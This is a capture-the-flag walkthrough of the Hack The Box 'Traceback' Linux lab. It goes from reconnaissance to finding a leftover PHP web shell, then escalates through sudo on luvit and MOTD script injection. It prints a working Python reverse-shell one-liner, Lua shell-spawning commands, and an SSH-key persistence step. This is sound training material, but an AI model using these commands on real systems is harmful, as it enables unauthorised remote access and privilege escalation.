HTB Traceback Walkthrough

6 min readAug 14, 2020

Easy Linux box, there is a hidden message in HTML comment that’s telling us there is a PHP shell on the server, so we look for it and use it to get a foothold, then we use a file that contains Lua standard libraries for escalating privileges to user, and finally, we use the MOTD(message of the day) files for rooting the box.

Reconnaissance

As always we start with the Nmap scan to check open ports and the services that are running on the server

nmap -sT -sC -sV 10.10.10.181

-sT to run TCP scan
-sC to use Nmap default script scan
-sV to enumerate service version

We see that we have:

Port 22 ssh is open and it runs OpenSSH 7.6p1
Port 80 HTTP is open and it runs apache/2.4.29

I ran gobuster to enumerate hidden directories

gobuster dir -u http://10.10.10.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

But gobuster didn’t find any interesting dirs

So I started with the manual HTTP enumeration, I opened http://10.10.10.181/ in my browser and I got

The index page has been defaced and the hacker left a message saying “I have left a backdoor” so I assume that there is a PHP shell on the webserver

I checked the source of the page and I saw an interesting HTML comment “Some of the best web shells that you might need”

I googled “best web shells that you might need” and I got a GitHub repository containing different PHP shells

I tried to put the name of these shells in URL one by one and when I tried

http://10.10.10.181/smevk.php

It actually worked and I got the PHP shell executed

I read the shell source code in the Github repo and I found that the username and the password is “admin”

I got access to the shell after providing the creds

Exploitation

I used the python reverse shell from pentestmonkey and I listened on port 1234 using Netcat on my Kali machine, but since the machine is running python3 so I just changed python to python3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.93",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

and I got a shell then I upgraded my shell using

python3 -c 'import pty;pty.spawn("/bin/bash");'
ctl+z
stty raw -echo
fg
export TERM=xterm-256color

I checked the users on the server and I got webadmin

inside the home directory /home I got sysadmin which is another user, I tried to enter the sysadmin and I got Permission denied

inside webadmin directory I found note.txt

The note says that there is a tool for practising Lua.

I typed sudo -l to check if the user webadmin can execute something with sudo, and I got that he can run sudo on /home/sysadmin/luvit

I googled luvit and I got “Luvit is a single binary that contains the lua vm, libuv, openssl, miniz as well as a host of standard libraries implemented in lua that closely resemble the public node.js APIs. You give it a lua script to run and it runs it in the context of this system.”

So we can use it to run Lua scripts.

Then I started to read on how to execute commands on the system using Lua

Privilege Escalation

Then I created a file and named it hadi.lua and I wrote in it

os.execute("ls")

then I ran the file using

sudo -u sysadmin /home/sysadmin/luvit hadi.lua

and the script got executed and the files in my current dir has been listed

If we can execute commands on the server using the luvit tool that is run by the user sysadmin, we can execute bash command and we will get a shell as sysadmin

So I opened the Lua file again and typed

os.execute("/bin/bash -i")

then I executed the file again and I became sysadmin

PrivilegeEscalation phase two
Escalating from user to root

I checked the network, I checked the installed software I checked the suid …. and couldn’t find interesting stuff until I checked the running processes using the pspy tool

I created a simple python HTTP server on my kali machine and transferred the pspy to the target machine using wget

I gave the tool a 755 permission and I ran it, and it showed me all the processes that are running in real-time.

We can see that the content of /var/backups/.update-motd.d

gets copied to /etc/update-motd.d every 30 seconds

I read about mot.d and I find this article “UNIX/Linux system administrators often communicate important information to console and remote users by maintaining text in the file /etc/motd, which is displayed by the pam_motd(8) module on interactive shell logins.”

So we can write “messages” in it …..mmm interesting, what will happen if we write commands in it???? let’s find out

I navigated to /var/backups/.update-motod.d and I saw that all the files have root permission

I tried to manipulate the 00-header which is the file that contains the message that the user sees when he/she login through ssh

and I add the id command

echo "id" >> 00-header

But I got permission denied.

So I navigated to /etc/update-motd.d which is the place that the files are being copied to, and I opened 00-header using nano

nano 00-header

and I added the following

And I succeed with manipulating the content of the file this time

I used echo to type “Hacked and rooted by Hadi”, and whoami and id to see the privileges that the commands gets executed under, and I used cat to read the root flag in the root directory(that we need root privileges to do it)

Then I created an ssh key on my Kali machine, and I tried to copy it’s content to the authorized_keys for the user sysadmin in /home/sysadmin/.ssh/authorized_keys

Then I tried to enter the system using ssh